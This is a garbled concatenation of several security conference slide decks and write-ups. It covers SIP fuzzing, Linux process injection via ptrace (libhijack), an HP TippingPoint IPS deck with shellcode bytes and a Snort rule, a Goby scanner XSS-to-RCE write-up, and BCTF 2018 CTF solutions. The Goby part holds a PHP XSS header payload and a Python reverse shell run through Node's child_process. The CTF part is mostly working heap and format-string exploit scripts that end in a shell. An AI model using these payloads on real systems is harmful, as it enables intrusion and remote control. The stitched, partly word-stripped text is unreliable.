Software ● Special SIP Devices/Software – SIP Firewalls, ACL Devices, Proxies – Connected SIP Trunks, 3rd Party Gateways – MSAN/MGW – Logging Software (Indirect) – Special Products: Cisco, Alcatel, Avaya, Huawei, ZTE... 28 # Old School Fuzzing ● Request Fuzzing – SDP Features – MIME Type Fuzzing ● Response Fuzzing – Authentication, Bogus Messages, Redirection ● Static vs Stateful ● How about Smart Fuzzing – Missing State Features (ACK,PHRACK,RE-INVITE,UPDATE) – Fuzzing After Authentication (Double Account, Self-Call) – Response Fuzzing (Before or After Authentication) – Missing SIP Features (IP Spoofing for SIP Trunks, Proxy Headers) – Numeric Fuzzing for Services is NOT Memory Corruption – Dial Plan Fuzzing, VAS Fuzzing 29 # How Viproy Pen-Testing Kit Helps Fuzzing Tests ● Skeleton for Feature Fuzzing, NOT Only SIP Protocol ● Multiple SIP Service Initiation – Call Fuzzing in Many States, Response Fuzzing ● Integration With Other Metasploit Features – Fuzzers, Encoding Support, Auxiliaries, Immortality etc. ● Custom Header Support – Future Compliance, Vendor Specific Extensions, VAS ● Raw Data Send Support (Useful with External Static Tools) ● Authentication Support – Authentication Fuzzing, Custom Fuzzing with Authentication ● Less Code, Custom Fuzzing, State Checks ● Some Features (Fuzz Library, SDP) are Coming Soon 30 # Fuzzing SIP Services Request Based OPTIONS/REGISTER/SUBSCRIBE/INVITE/ACK/RE-INVITE/UPDATE.... Soft Switch (SIP Server) Gateways 401 Unauthorized 403 Forbidden 404 Not Found 500 Internal Server Error Fuzzing Targets, REQUEST Fields ➔ Request Type, Protocol, Description ➔ Via, Branch, Call-ID, From, To, Cseq, Contact, Record-Route ➔ Proxy Headers, P-*-* (P-Asserted-Identity, P-Charging-Vector...) ➔ Authentication in Various Requests (User, Pass, Realm, Nonce) ➔ Content-Type, Content-Lenth ➔ SDP Information Fields ➔ ISUP Fields 100 Trying 183 Session Progress 180 Ringing 200 OK Clients 31 # Fuzzing SIP Services Response Based OPTIONS Soft Switch (SIP Server) Gateways INVITE/ACK 401 Unauthorized 403 Forbidden 404 Not Found 500 Internal Server Error 100 Trying 183 Session Progress 180 Ringing 200 OK INVITE Myself / INVITE I'm Proxy MALICOUS RESPONSE MALICOUS RESPONSE Potential RESPONSE Types for Fuzzing Clients DEMO Attacking SIP Servers for Fun & Profit Demo Sample https://www.youtube.com/watch?v=AbXh_L0-Y5A 33 References ● Viproy VoIP Penetration and Exploitation Kit Author : http://viproy.com/fozavci Homepage : http://viproy.com/voipkit Github : http://www.github.com/fozavci/viproy-voipkit ● Attacking SIP Servers Using Viproy VoIP Kit (50 mins) https://www.youtube.com/watch?v=AbXh_L0-Y5A ● Hacking Trust Relationships Between SIP Gateways (PDF) http://viproy.com/files/siptrust.pdf ● VoIP Pen-Test Environment – VulnVoIP http://www.rebootuser.com/?cat=371 Q ? Thanks
Runtime Process Insemination Shawn “lattera” Webb SoldierX https://www.soldierx.com/ Who Am I?  Just another blogger  Professional Security Analyst  Twelve-year C89 programmer  Member of SoldierX, BinRev, and Hack3r Disclaimers  Opinions/views expressed here are mine, not my employer’s  Talk is semi-random  Tied together at the end  Almost nothing new explained  Theory known  New technique  Presentation and tools only for educational purposes Assumptions  Linux? What's that?  Concepts carry over to Windows and OSX  Basic knowledge of C and 32bit Linux memory management  Ability and desire to think abstractly  Non-modified memory layout (NO grsec/pax) History  CGI/Web App vulnerabilities  Needed connect-back shellcode  Needed reliable, random access − Firewall holes are a problem − Needed way to reuse existing connection to web server  Needed to covertly sniff traffic  Libhijack is born (discussed later) Setting the Stage  Got a shell via CGI/Web App exploit  Reliable way to get back in  Apache good candidate − Already listening for connections  Modify apache process somehow to run a shell when a special string is sent − i.e. GET /shell HTTP/1.1 $ whoami apache  Need to hook certain functions in runtime Current Techniques  Store shellcode on the stack  Stack is non-executable  Store shellcode at $eip  Mucks up original code  Store shellcode on the heap  Heap is non-executable  LD_PRELOAD?  Process has already started Process Loading  execve is called  Kernel checks file existence, permissions, etc.  Kernel loads RTLD (Runtime Linker (ld.elf.so))  Kernel loads process meta-data, initializes stack  Meta-data loaded at 0x08048000 on Intel 32bit Linux Runtime Linker  Loads process into memory  Loads dependencies (shared objects)  DT_NEEDED entries in the .dynamic section  Patches PLT/GOT for needed dynamic functions  Calls initialization routines  Finally calls main() ELF  Executable and Linkable Format  PE-COFF based on ELF  Meta-data  Tells RTLD what to load and how to load it ELF  Describes where to load different parts of the object file  Process Header (PHDR) – Minimum one entry; contains virtual address locations, access rights (read, write, execute), alignment  Section Header (SHDR) – Minimum zero entries; describes the PHDRs; contains string table, debugging entries (if any), compiler comments  Dynamic Headers – Contains relocation entries, stubs, PLT/GOT (jackpot) Process Tracing  Ptrace – Debugging facility for Linux  Kernel syscall  GDB relies on ptrace  Read/write from/to memory  Get/set registers  Debugee becomes child of debugger  Destructive − Original ptrace engineer evil, likely knew it could be abused Allocating Memory  We have arbitrary code to store. Where?  Allocate memory in child  Unlike Windows and OSX, we cannot allocate from the parent process, the child must allocate  Find “int 0x80” opcode  Program's main code won't call kernel  Calls library functions which call the kernel − Libc!  Find a library function that calls the kernel by crawling the ELF meta-data Allocating Memory  Parse ELF headers, loaded at 0x08048000  Headers include lists of loaded functions  Back up registers  Set $eip to address of found “int 0x80” opcode  Set up stack to call mmap syscall  Continue execution until mmap finishes Injecting Shellcode  After calling mmap  $eax contains address of newly-allocated mapping  Can write to it − Even if mapping is marked non-writable (PROT_READ | PROT_EXECUTE)  Restore the backed-up registers  Decrement $esp by sizeof(unsigned long)  Simulate pushing $eip onto the stack for return address Injecting Shellcode  Write shellcode to newly-allocated mapping  Set $eip to address of the shellcode  Detach from the process  Sit back, relax, and enjoy life  But wait! There's more! Hijacking Functions  Global Offset Table/Procedure Linkage Table  Array of function addresses  All referenced functions are in GOT/PLT  PLT/GOT redirection  Shellcode[“\x11\x11\x11\x11”] = @Function  GOT[@Function] = @Shellcode  Can hijack, but cannot reliably remove hijack Injecting Shared Objects  Why?  Don't have to write a ton of shellcode  Write in C, use other libraries, possibilities are endless  Two ways of doing it  The cheating way: Use a stub shellcode that calls dlopen()  The real way: rewrite dlopen() The Cheating Way  Allocate a new memory mapping  Store auxiliary data in mapping  .so path  Name of the function to hijack  Stub shellcode  Stub shellcode will:  Call dlopen and dlsym  Replace GOT entry with entry found via dlsym The Cheating Way  Advantages  Easy  Extendable  Fast  Disadvantages  Entry in /proc/pid/maps  Rely on stub shellcode The Real Way  Reimplement dlopen  Load dependencies (deps can be loaded via real dlopen)  Create memory maps  Write .so data to new memory maps  Patch into the RTLD  Run init routines  Hijack GOT The Real Way  Advantages  Completely anonymous  Extensible  Disadvantages  Takes time to research and implement Shared Objects  Shared objects can have dependencies  Shared objects have own PLT/GOT  Loop through Dynamic structures found in linkmap  Use same PLT/GOT technique against shared objects  Even shared objects loaded via dlopen Libhijack  Libhijack makes injection of arbitrary code and hijack of dynamically-loaded functions easy  Shared objects via the cheating method  Inject shellcode in as little as eight lines of C code  Full 32bit and 64bit support  Other OSs coming soon  Always looking for help  https://github.com/lattera/libhijack Libhijack Release 0.5  At the end of the day, I'll release version 0.5 of libhijack  Uncached function searching  Hijack within shared objects  Breaks existing (0.3, 0.4) API  Various bug fixes Libhijack TODO  Version 0.6  Figure out why certain functions don’t show up in GOT resolution (Known 0.5 bug)  Inject shared objects via “The Real Way”  Possible FreeBSD port  Always looking for help Prevention  Make sure PLT/GOT entries point to correct lib  How? Symbol table resolution?  Use dtrace, disable ptrace  From Solaris  Non-destructive debugging  Limit ptrace usage (apache user shouldn't use it)  Hypervisor?  Grsec/PAX  Only protects to a certain extent Demo Assembly loading .so exit(0); Comments/questions Thanks
© Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 1 Vulnerability, Malware and DDoS HITCON 2014 Taipei, Taiwan 石謂龍 Robin Shih, APJ TippingPoint Solution Architect HP ESP rshih@hp.com +886-935784086 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 2 Agenda Vulnerability Protection Malware Detection and Communication Cut-off DDoS Risk Report Q&A © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Vulnerability Protection © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 4 4 Digital Vaccine® – Security Accuracy Term Definition Vulnerability > A security flaw in a software program Exploit > A program that takes advantage of a vulnerability to gain unauthorized access or block access to a network element, compute element, O/S, or application Exploit Filter > Written only to a specific exploit > Filter developers often forced to basic filter design due to engine performance limitations > Impact - Missed attacks, false positives and continued vulnerability risk RESULT: Acts as a Virtual Software Patch Vulnerability “Fingerprint” Exploit A “Fingerprint” Exploit B “Fingerprint” (Missed by Coarse Exploit A signature) False Positive (coarse signature) Simple Exploit A Filter Virtual Software Patch © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 5 Overview of the Attack BIND Interface: ISystemActivator 000001a0-0000- 0000-c000- 000000000046 v0.0 REQUEST Function Call: Opnum 4 -------------- Function Arguments \\server\file Server Port 135/tcp Interfaces Available: e1af8308-5d1f-11c9-91a4-08002b14a0fa v3.0 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b v1.1 975201b0-59ca-11d0-a8d5-00a0c90d8051 v1.0 e60c73e6-88f9-11cf-9af1-0020af6e72f4 v2.0 99fcfec4-5260-101b-bbcb-00aa0021347a v0.0 b9e79e60-3d52-11ce-aaa1-00006901293f v0.2 412f241e-c12a-11ce-abff-0020af6e7a17 v0.2 00000136-0000-0000-c000-000000000046 v0.0 c6f3ee72-ce7e-11d1-b71e-00c04fc3111a v1.0 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 v0.0 000001a0-0000-0000-c000-000000000046 v0.0 Pkt 1 Pkt 2 Pkt 3 SERVER PACKETS FROM CLIENT Function Call 4, contains a heap-based buffer overflow in the server parameter. © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 6 Vulnerability Filter A vulnerability filter will check: TCP session established to appropriate port (135) BIND to the appropriate RPC interface REQUEST the appropriate function call (opnum=4) Navigate to the vulnerable parameter Determine that an overlong servername has been supplied Pros: High Precision, hard to evade Cons: Requires powerful and fast filtering engine © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 7 Exploit Filter An exploit-specific filter detects the shell code used in a particular exploit. High false negatives. For example: EB 19 5E 31 C9 81 E9 89 FF FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 Pros: Simple string match, easy to design and implement, suitable for weak engines Cons: High false negatives, filter is blind if exploit is modified © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 8 8 Policy Filter Policy filter detects all BINDs to the vulnerable interface Will detect legitimate traffic as well as attacks Defining this traffic as unacceptable •Spyware, Pings from the internet, etc. Pros: Simple string match, easy to design and implement, suitable for weak engines Cons: High false positives when used to detect exploitation of a vulnerability alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2192; rev:1;) Example: Snort's signature for the RPC DCOM overflow http://www.snort.org/snort-db/sid.html?sid=2192 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 9 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 10 How does HP TippingPoint deal with it? 12 March, 2014 ZDI disclosed to MS at Pwn2Own/Pwn4Fu n 18 March, 2014 TippingPoint IPS customers are protected against this vulnerability by Digital Vaccine protection filter ID 13787 30 July, 2014 Public release of advisory Ahead 113 days © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 11 How does Heartbleed work? *Source:http://xkcd.com/1354 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Malware Detection and Communication Cut-off © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 13 How can a hacker control your device? Virus SQL Injection Internet DDoS Phishing Trojan Worm © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 14 Discovery Why Does Security Intelligence Matter? Research Enterprise Ecosystem Infiltration Capture Exfiltration © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 15 1. A combination of reputation feed and malware filters 2. Malware filter package will be updated weekly, while reputation feed will be updated ~ 2 hours 3. Malware filters that are designed to detect post-infection traffic including: What is ThreatDV? Vulnerability Page and Parameter SSL IPS NEW Bot Activity Phone Home Command & Control Data Exfiltration Reputation © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 16 ThreatDV + Reputation Stops Attacks – Use Case: BlackPoS malware (used in Target Breach) 1. ThreatDV filter detects BlackPOS data exfiltration attempts using naming convention matching in FTP 2. Reputation provides protection using blacklisted IP address 3. Attack is stopped! © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 17 ThreatDV + Reputation Stops Attacks – Use Case: ChewBacca TOR based malware example 1. ThreatDV has Chewbacca specific malware filters that detects DNS queries to known Chewbacca CnC servers 2. Reputation detects TOR exit nodes used in this attack 3. Chewbacca traffic is detected by using a TOR network activity filter 4. Attack is stopped! © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 18 How to Evaluate the Reputation of a Device? Network Traffic in/out – Applications used – Traffic matching exploits – Good vs. bad traffic Network Applications – Services – Content hosted (malware) – Application issues/vulns Associations – Participation in malware – Participation in scams – Participation in Phishing Device Reputation – Device behaving well? – Generating Exploit traffic? – Part of Botnet? – Hosting Malware? – P2P Super Node? – … © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 19 DVLabs Reputation Service: Changing the Face of Reputation Reputation Database • IPv4 Addresses • IPv6 Addresses • DNS Names • 1M+ IP Addresses • 1M+ DNS Names • Updates Every 2 Hr ThreatLinQ Database › Global threat monitoring event DB › Over 12M real-time attack events daily TippingPoint Lighthouse Program • Real-time attack sensors • Globally deployed • Detailed data collection Customer Event Data • Attack events • Global customer IPS • Detailed data collection Open Source Community › Various malware/ phishing/ botnet communities › Unallocated (Bogon) Lists › DVLabs validated 3rd Party Malware Research › Malware research and analysis › Identify devices participating in malware activity 3rd Party Web & Email Research › Providers of web/email security › Analysis of malicious traffic SANS Institute › Global Community participation › Correlates Firewall Security Events August 10, 2014 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 20 BLOCK OUTBOUND TRAFFIC BLOCK INBOUND TRAFFIC Reputation Database • IPv4 & IPv6 Address • DNS Names • Geography • Merge with your data HP TippingPoint Access Switch •Botnet Trojan downloads •Malware, spyware, & worm downloads •Access to botnet CnC sites •Access to phishing sites •Spam and phishing emails •DDoS attacks from botnet hosts •Web App attacks from botnet hosts Botnet CnC 5,000 - 6,000 sites worldwide Phishing Sites 50,000+ new phishing sites discovered monthly Malware Depots Estimates of 2,500 - 50,000 new malware depots discovered daily Compromised Hosts Millions worldwide Spammers Up to 80% of spam generated by top 100 spammers Stop All Communications with Bad IP and Domain HP TippingPoint Reputation Feeds © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 21 ThreatDV stops Botnet-- Real Case HP TippingPoint Reputation Feed Multiple inside devices communicate with a malicious IP in midnight Czech Republic © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. DDoS © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 23 Real Case Study 1 (Stuff up the link of a manufacture ) ICMP Fragmented Packet (Compare with history behavior) (ICMP Fragment events show up a pick on 5/31) ICMP Fragment Flooding consumes bandwidth We found over 10,000,000 ICMP Fragmented Packets in one hour. The packet size is 1,500Bytes. It means this ICMP flooding consumes 33Mbps bandwidth. Manufacture in SH Data Center in TP © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 24 Trend analysis helps detecting abnormal traffic in real time Drill Down We can see all attack sources (Inside IP- Botnet) (Destination- Victim) (Huge Amount) © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 25 Real Case Study 2 (Brute force attack) (17:39, Brute Force AD event burst) (We can find attackers in 1 min) © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 26 Real Case Study 3 (Crash DNS Service) Huge DNS NX Domain Query FW/DNS can’t handle them Impact Web browsing (134 source IP addresses send NX Domain queries at the same time) 1: Probe detects abnormal NX Domain Query DNS Protection Solution: Deployment Example internet DNS Perimeter 1 1 Probe Analyzer Probe Analyzer Probe Analyzer Probe Analyzer Enterprise Users IDC Mobile Home HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint SMS HP TippingPoint SMS HP TippingPoint SMS HP TippingPoint SMS 2: Probe sends NX Domain blocking list to TippingPoint SMS DNS Protection Solution: Deployment Example internet DNS Perimeter 2 1 1 Probe Analyzer Probe Analyzer Probe Analyzer Probe Analyzer Enterprise Users IDC Mobile Home HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint SMS HP TippingPoint SMS HP TippingPoint SMS HP TippingPoint SMS 3: SMS updates policy to block NX Domain queries. It’s not IP isolation. All normal domain queries will be allowed DNS Protection Solution: Deployment Example internet DNS Perimeter 2 1 1 3 Probe Analyzer Probe Analyzer Probe Analyzer Probe Analyzer Enterprise Users IDC Mobile Home HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint IPS HP TippingPoint SMS HP TippingPoint SMS HP TippingPoint SMS HP TippingPoint SMS Block Block Block Block To deny NX Domain query is the best solution against NX Domain attacks using spoof IPs Deny NX Domain Query- 24 hours statistic Deny NX Domain queries- Save DNS servers DNS Amplify – Generate 28-40 times traffic ANY Request using victim’s IP address Victim DNS Servers Zombie A Records… MX Records… …. HP TippingPoint Major Purpose- Consume bandwidth DNS Amplify TOP 10 Makers- 24 hours statistic They are not user’s IPs (Spoofed IP address) They are not user’s IPs (Spoofed IP address) They are not user’s IPs (Spoofed IP address) They are not user’s IPs (Spoofed IP address)---- Should be hacker’s target Should be hacker’s target Should be hacker’s target Should be hacker’s target DDoS DDoS DDoS DDoS防禦案例 防禦案例 防禦案例 防禦案例((((不當流覽網頁 不當流覽網頁 不當流覽網頁 不當流覽網頁))))---- 即時分析得知 即時分析得知 即時分析得知 即時分析得知,,,,立即消弭 立即消弭 立即消弭 立即消弭 惡意流 惡意流 惡意流 惡意流 覽來源 覽來源 覽來源 覽來源 2/19 02:54 2/19 02:54 2/19 02:54 2/19 02:54 異常突增 異常突增 異常突增 異常突增 一台電腦一 一台電腦一 一台電腦一 一台電腦一 分鐘流覽首 分鐘流覽首 分鐘流覽首 分鐘流覽首 頁 頁 頁 頁368 368 368 368次 次 次 次???? 遭惡意 遭惡意 遭惡意 遭惡意 流覽的 流覽的 流覽的 流覽的 網站 網站 網站 網站IP IP IP IP DDoS DDoS DDoS DDoS防禦案例 防禦案例 防禦案例 防禦案例(SSH (SSH (SSH (SSH登入猜測 登入猜測 登入猜測 登入猜測))))---- 即時分析得知 即時分析得知 即時分析得知 即時分析得知,,,,立即消弭 立即消弭 立即消弭 立即消弭 惡意攻擊來源 惡意攻擊來源 惡意攻擊來源 惡意攻擊來源 2/12 07:45 2/12 07:45 2/12 07:45 2/12 07:45 異常突增 異常突增 異常突增 異常突增 針對多個目標 針對多個目標 針對多個目標 針對多個目標 進行巨量 進行巨量 進行巨量 進行巨量SSH SSH SSH SSH 登入猜測 登入猜測 登入猜測 登入猜測 ---- FW FW FW FW效能 效能 效能 效能???? 瞬間發 瞬間發 瞬間發 瞬間發 出巨量 出巨量 出巨量 出巨量 SSH SSH SSH SSH登入 登入 登入 登入 請求 請求 請求 請求 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. 2013 Risk Report © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Vulnerability Trends © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 37 Disclosed vulnerabilities measured by NVD, 2010–2013 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 38 High-severity vulnerabilities are decreasing Disclosed vulnerabilities by severity measured by NVD, 2010–2013 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 39 SCADA systems increasingly targeted SCADA submissions to the Zero Day Initiative, 2010–2013 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Mobile © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 41 Mobile prevalence only continues to grow 1 Sophos Labs 2013 2 intomobile.com/2013/07/03/more-than-160-billion-apps-downloaded-2017 3 Smart Insights, Jupiter Research 2013 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 42 Mobile Security Landscape Explosion in usage • Cyber Monday 2013: 55.4% year over year mobile shopping increase1. Mobile security efforts lag behind their web counterparts • While both suffer from the same type of vulnerabilities, mobile security not yet as disciplined. Mobile apps are easily exploitable •96% of attacks not particularly difficult to execute2. 1 IBM Analytics 2 2012 Data Breach Investigations Report (DBIR), Verizon Business, April 2012 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 43 Global 2000 Mobile Security study Tested more than 2000 mobile applications from 600+ companies © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 44 HP 2013 Cyber Risk Report Mobile – Top Issues © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 45 HP 2013 Cyber Risk Report Mobile – Top 4 client side issues © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 46 HP 2013 Cyber Risk Report Mobile – Top 4 issues © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 47 Core Area Core Area Wireless Area 行動裝置的連結認證與持續監控流程 Internet Wireless Management DHCP/DNS Access Point Login Portal (BYOD) AD/RADIUS Analyzer TippingPoint © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. 48 一張表格讓IT人員掌握BYOD的使用情況 Time Event Hit Count Private SourceIP Public SourceIPUsername Source MAC Location 2012/5/7 21:361400: SMB Windows Logon Failure 152192.168.1.222 Robin Shih 00-50-56-C0-00-01 AP-1 2012/5/7 21:449991: HTTPS: Google Gmail Access 2192.168.1.33 Sandy Chen 00-50-56-DF-11-1A AP-1 2012/5/7 21:45 Ken Yip 00-50-56-62-13-2F AP-2 2012/5/7 21:52 2270: BitTorrent: Peer-to-Peer Communications 69192.168.1.33 Sandy Chen 00-50-56-DF-11-1A AP-1 2012/5/7 21:59 Richard Chou 00-50-56-00-14-B4 AP-1 2012/5/7 22:17 6545: MS-RPC: Microsoft Server Service Buffer Overflow 1192.168.2.88 Peter White 00-50-56-77-11-54 AP-2 2012/5/7 22:22 Jeremy Lin 00-50-56-DD-30-6AAP-1 2012/5/7 22:255670: HTTP: SQL Injection (SELECT) 17192.168.2.88 Peter White 00-50-56-77-11-54 AP-2 © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. Q&A © Copyright 2013 Hewlett-Packard Development Company, L.P. The information contained herein is subject to change without notice. HP Confidential. . Thank you
GOBY 0x00 awvsgoby 0x01 windowsgobymac /Applications/Goby.app app electronapp.asarjs asar e app.asar builddist jsbuilddist exec execSync scan.js render.js 90000js 0x02 xsshttp goby xss ip phpphpvendor headerh1phphttpserver XSSscriptimg <img src="x" onerror="alert(1);"> tab XSS jbXSS ip 8080 xss 0x03 XSSRCE XSSelectronXSSRCEhttps://www.uedbox.com/post/54188/ require('child_process').exec('xxxxxxx'); rce N 1. tabjs 2. 3. 4. '-' ${IFS} //IFS {'ls','-a'} // exec execjs execFile js 1. goby 2. phpheaderxssjs 3. js 4. jbxssrce phpindex.php <?php header("X-Powered-By: PHP/<img src=\"x\" onerror=import(unescape('http%3A//'))>"); ?> %3ACamarotest2.js (function(){ require('child_process').exec('open /System/Applications/Calculator.app'); require('child_process').exec('python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_ST REAM);s.connect(("",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess .call(["/bin/sh","-i"]);\''); })(); pyshell99999999ncjsgoby chromejs php sudo php -S -F index.php goby->IP->XSS->RCE 0x04 gobyXSSshell js RCEXSSRCE jsexecXSSXSS XSSRCE 1clickr1 0x05 goby gobygoby web goby urlurl url goby30x 302127.0.0.1 OK api RCE
BCTF 2018 By Nu1L BCTF 2018 PWN easiest three hardcore_fmt SOS easywasm Reverse easypt Web checkin SimpleVN babySQLiSPA SEAFARING1 SEAFARING2 Crypto guess_polynomial guess_number BlockChain EOSGame Fake3D MISC easysandbox https://bctf.xctf.org.cn/ 1127 14:00 - 1129 02:00 PWN easiest Double Freetcache Leak GOT0x40size from pwn import * #p = process('./easiest') p = remote('', 9999) def add(idx, size, c): p.recv() three p.sendline('1') p.recvuntil('(0-11):') p.sendline(str(idx)) p.recvuntil('Length:') p.sendline(str(size)) p.recvuntil('C:') p.sendline(c) def dele(idx): p.recv() p.sendline('2') p.recvuntil('(0-11):') p.sendline(str(idx)) add(0, 0x38, 'aaa') add(1, 0x38, 'bbb') dele(0) dele(1) dele(0) add(2, 0x38, p64(0x60203a)) add(3, 0x38, p64(0x60203a)) add(4, 0x38, p64(0x60203a)) add(5, 0x38, '\x40\x00\x00\x00\x00\x00' + p64(0x400946) * 5) p.interactive() from pwn import * def add(cont): p.recvuntil('choice') p.sendline('1') p.recvuntil('content:') p.send(cont) def edit(idx,cont): p.recvuntil('choice') p.sendline('2') p.recvuntil('idx') p.sendline(str(idx)) p.recvuntil('content:') p.send(cont) def dele(idx,cl = 'n'): p.recvuntil('choice') p.sendline('3') p.recvuntil('idx') p.sendline(str(idx)) p.recvuntil('):') p.sendline(cl) while True: try: p=remote('', 9999) #p=process('./three')#,env={'LD_PRELOAD':'./libc.so.6'}) add('\n') add('\n') add((p64(0xc0)+p64(0x21))*4) dele(2,'y') dele(1,'y') dele(0) edit(0,'\x70') add('\x70') add('\n') edit(0,p64(0)+p64(0x91)) dele(1,'y') dele(2) dele(2) dele(2) dele(2) dele(2) dele(2) dele(2) edit(0,p64(0)+p64(0x51)) dele(2) edit(0,p64(0)+p64(0x91)) dele(2,'y') x = 0xa8#int(raw_input(),16)# edit(0,p64(0)+p64(0x51)+'\xe8'+chr(x)) add('\xe8'+chr(x)) #add(p64(0xffffffffff600400)) add(p64(0)) dele(1) dele(1,'y') edit(0,p64(0)+p64(0x51)+'\x78') edit(2,p64(0xffffffffff600400)) add('\x78') dele(1,'y') add('\xd8'+chr(x)) dele(0,'y') add('\x40') dele(0,'y') add('\n') dele(0,'y') add('/bin/sh\x00') BCTF{U_4r3_Ready_For_House_OF_ATUM} hardcore_fmt a =0xa9#int(raw_input(),16) b =0x26#int(raw_input(),16) c =0x94# int(raw_input(),16) edit(2,chr(a)+chr(b)+chr(c)) p.recvuntil('choice') p.sendline('3') re = p.recvuntil('idx',timeout=0.8) if re[-1:] != 'x': continue p.sendline('0') p.sendline('cat flag;bash') re = p.recvuntil('(y/n)',timeout = 0.8) if re: print re continue p.sendline('echo 123;cat flag') p.interactive() except: p.close() continue #coding=utf8 from pwn import * context.arch = 'amd64' context.log_level = 'debug' context.aslr = False def pwn(p): p.recvuntil('Welcome to hard-core fmt\n') p.sendline('%a'*5) p.recvuntil('0x0p+00x0.0000000000001p-10220x0.0') addr1 = int(p.recvuntil('p-10220x0.0', drop=True) + '00', 16) - 0x100 - 0x1000 log.success('addr1: {}'.format(hex(addr1))) addr2 = int(p.recvuntil('p-10220x0.0', drop=True) + '00', 16) - 0x1500 log.success('addr2: {}'.format(hex(addr2))) p.sendline(str(addr2 + 0x14c0 + 0x68 + 1)) p.recvuntil(': ') # getsstack_addr libc_base = addr1 - 0x619000 ld_base = addr1 - 0x228000 log.success('libc_base: {}'.format(hex(libc_base))) log.success('ld_base: {}'.format(hex(ld_base))) mem_addr = libc_base + 0x3EB0A8 # strlen mem_addr = libc_base + 0x3EB140 # memcpy SOS canary = '\x00' + p.recv(7) log.success('cnaary: {}'.format(hex(u64(canary)))) payload = 'a'*0x108 + canary + 'b'*0x8 + p64(mem_addr) + 'c'*0x8 + p64(0xffffffffff600000) * 7 p.sendline(payload) # leak program p.sendline(str(addr1 + 0x30 + 0x1000)) p.recvuntil(': ') program_base = u64(p.recv(6) + '\x00\x00') - 0x238 log.success('program_base: {}'.format(hex(program_base))) payload = p64(program_base + 0x970) # start p.sendline(payload) # p.recvuntil('Welcome to hard-core fmt\n') p.sendline('hahaha') 